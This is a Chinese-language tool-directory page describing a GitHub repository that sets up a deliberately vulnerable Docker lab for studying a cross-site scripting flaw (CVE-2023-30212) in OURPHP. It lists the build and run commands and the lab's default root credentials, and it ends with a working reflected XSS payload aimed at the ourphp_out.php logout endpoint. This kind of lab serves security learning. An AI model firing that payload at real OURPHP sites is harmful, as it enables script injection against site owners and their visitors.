Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/visdev23/vulnerable-docker--cve-2023-30212-
容器安全漏洞分析漏洞利用Web安全学习与教育实验室与实践
GitHubvisdev23/vulnerable-docker--cve-2023-30212-

Vulnerable-Docker--CVE-2023-30212-

这包含了复现OURPHP中一个XSS漏洞(CVE-2023-30212)所需的文件和Docker配置。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1153年前尚未审核

Vulnerable-Docker-CVE-2023-30212-

此仓库包含必要的目录和Dockerfile,用于复现OURPHP中的一个跨站脚本(XSS)漏洞(CVE-2023-30212)。

创建易受攻击的Docker环境(CVE-2023-30212)

前置条件

安装Docker sudo apt install -y docker.io

按以下步骤逐一执行:

使用git clone下载此仓库中的文件 git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git 。

包含必要的目录和Dockerfile,用于复现该场景。

下载文件后,使用以下命令构建Docker镜像: sudo docker build -t <给Docker取个合适的名称> . 。

! 为Docker镜像添加一个名称,以便后续调用。

将Docker镜像转换为容器,使用: sudo docker run -d -p 80:80 <Docker镜像名称> 。

! 此处将容器端口映射到主机80端口。

查看Docker容器状态: sudo docker ps

完成上述步骤后,

访问localhost并使用以下凭据配置OURPHP: 用户名:root 密码:root 数据库名称:data

现在需要配置管理员用户名和密码。设置如下: 用户名:root 密码:root 然后继续操作。

我们的payload为: /client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>

将此payload附加到localhost或127.0.0.1之后,即可触发XSS。

下载工具